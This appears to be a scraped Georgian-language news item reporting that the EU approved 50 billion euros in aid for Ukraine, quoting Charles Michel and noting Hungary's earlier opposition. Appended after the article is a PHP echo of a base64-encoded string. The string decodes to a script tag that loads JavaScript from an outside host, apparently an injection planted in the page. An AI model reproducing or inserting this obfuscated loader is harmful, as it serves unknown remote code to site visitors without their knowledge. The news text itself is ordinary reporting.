gorgia
jaluzi

ევროკავშირმა უკრაინისთვის ფინანსური დახმარების სახით 50 მილიარდი ევროს გამოყოფა დაამტკიცა. ამის შესახებ განცხადება ევროკავშირის საბჭოს პრეზიდენტმა, შარლ მიშელმა გააკეთა.

მისი თქმით, კიევისთვის დამატებითი დაფინანსების გამოყოფას მხარი ევროკავშირის 27-მა წევრმა სახელმწიფომ დაუჭირა.

„ეს იძლევა გარანტიას უკრაინის დაფინანსება იყოს მუდმივი, გრძელვადიანი და პროგნოზირებადი. ევროკავშირმა გამოიჩინა ლიდერობა და პასუხისმგებლობა უკრაინის მხარდასაჭერის საკითხზე. ჩვენ ვიცით, რა დევს ფსონზე“, – განაცხადა შარლ მიშელმა.

მანამდე ცნობილი იყო, რომ უკრაინისთვის 50 მილიარდი ევროს გამოყოფას უნგრეთის პრემიერ-მინისტრი ეწინააღმდეგებოდა.

362
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");